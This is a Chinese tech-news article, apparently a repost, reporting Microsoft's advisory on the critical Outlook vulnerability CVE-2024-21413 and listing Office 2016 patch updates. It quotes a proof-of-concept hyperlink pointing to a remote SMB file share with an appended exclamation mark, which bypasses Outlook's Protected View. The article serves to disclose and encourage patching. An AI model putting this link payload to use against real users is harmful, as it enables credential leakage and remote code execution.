网站首页 > 知识剖析 正文
IT之家 2 月 16 日消息,微软近日发布安全公告,报告旗下的 Outlook 服务存在严重的远程代码执行漏洞,无需用户交互的情况下,只需要在 Outlook 超链接中添加“!”感叹号,就能读取相关机密文档。
该漏洞追踪编号为 CVE-2024-21413,在 CVSS 风险评估中基础得分(根据漏洞的固有特征反映漏洞的严重程度)为 9.8(满分 10 分),时间得分(评价漏洞被利用的时间窗的风险大小)为 8.5 分(满分 10 分)。
该漏洞由 Check Point Research 的安全专家 Haifei Li 发现并报告,根据微软官方描述,攻击者可以在文档扩展名及其嵌入链接后插入感叹号,就能绕过安全程序获得文档的高级权限,包括编辑潜在的恶意 "保护视图" 文档。
果文档中嵌入了带有 http 或 https 的超链接,Outlook 就会启动默认浏览器来显示它。例如:
<a href="skype:SkypeName?call">Call me on Skype</a>
安全研究人员发现一个感叹号就足以绕过保护机制。下面的链接演示了这一点:
<a href="file///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
微软目前已经发布了 Office 补丁,修复了 CVE-2024-21413 漏洞,并推荐用户尽快安装。
用于 Office 2016(32 位版本):
产品 | 文章 | 下载 | 内部版本号 |
---|---|---|---|
Microsoft Office 2016(32 位版本) | 5002537 | 安全更新 | 16.0.5435.1001 |
Microsoft Office 2016(32 位版本) | 5002467 | 安全更新 | 16.0.5435.1001 |
Microsoft Office 2016(32 位版本) | 5002522 | 安全更新 | 16.0.5435.1001 |
Microsoft Office 2016(32 位版本) | 5002469 | 安全更新 | 16.0.5435.1001 |
Microsoft Office 2016(32 位版本) | 5002519 | 安全更新 | 16.0.5435.1001 |
For Office 2016(64 位版本):
产品 | 文章 | 下载 | 内部版本号 |
---|---|---|---|
Microsoft Office 2016(64 位版本) | 5002537 | 安全更新 | 16.0.5435.1001 |
Microsoft Office 2016(64 位版本) | 5002467 | 安全更新 | 16.0.5435.1001 |
Microsoft Office 2016(64 位版本) | 5002522 | 安全更新 | 16.0.5435.1001 |
Microsoft Office 2016(64 位版本) | 5002469 | 安全更新 | 16.0.5435.1001 |
Microsoft Office 2016(64 位版本) | 5002519 | 安全更新 | 16.0.5435.1001 |
IT之家附上该漏洞的更多相关链接,感兴趣的用户可以点击阅读:
猜你喜欢
- 2024-11-17 微信公众号发送客服消息---菜单消息,卡片消息
- 2024-11-17 4.页面结构(页面结构元素)
- 2024-11-17 JavaScript代码的三种引入方式【操作演示】
- 2024-11-17 我们为什么要使用 href="javascript:void(0)"
- 2024-11-17 一、学爬虫前,你需要知道的爬虫常识
- 2024-11-17 我只用一个txt文档,就将公众号里面的所有文章列表提取出来
- 2024-11-17 码畜在工作中总结的知识点,记录一下
- 2024-11-17 04元素类型(元素种类总结)
- 2024-11-17 H5 nav元素的作用&应用场合(互联网应用与北斗系统在其中的作用)
- 2024-11-17 2024 年 PWA 无法与 Native 媲美的 7 个特性
- 最近发表
- 标签列表
-
- xml (46)
- css animation (57)
- array_slice (60)
- htmlspecialchars (54)
- position: absolute (54)
- datediff函数 (47)
- array_pop (49)
- jsmap (52)
- toggleclass (43)
- console.time (63)
- .sql (41)
- ahref (40)
- js json.parse (59)
- html复选框 (60)
- css 透明 (44)
- css 颜色 (47)
- php replace (41)
- css nth-child (48)
- min-height (40)
- xml schema (44)
- css 最后一个元素 (46)
- location.origin (44)
- table border (49)
- html tr (40)
- video controls (49)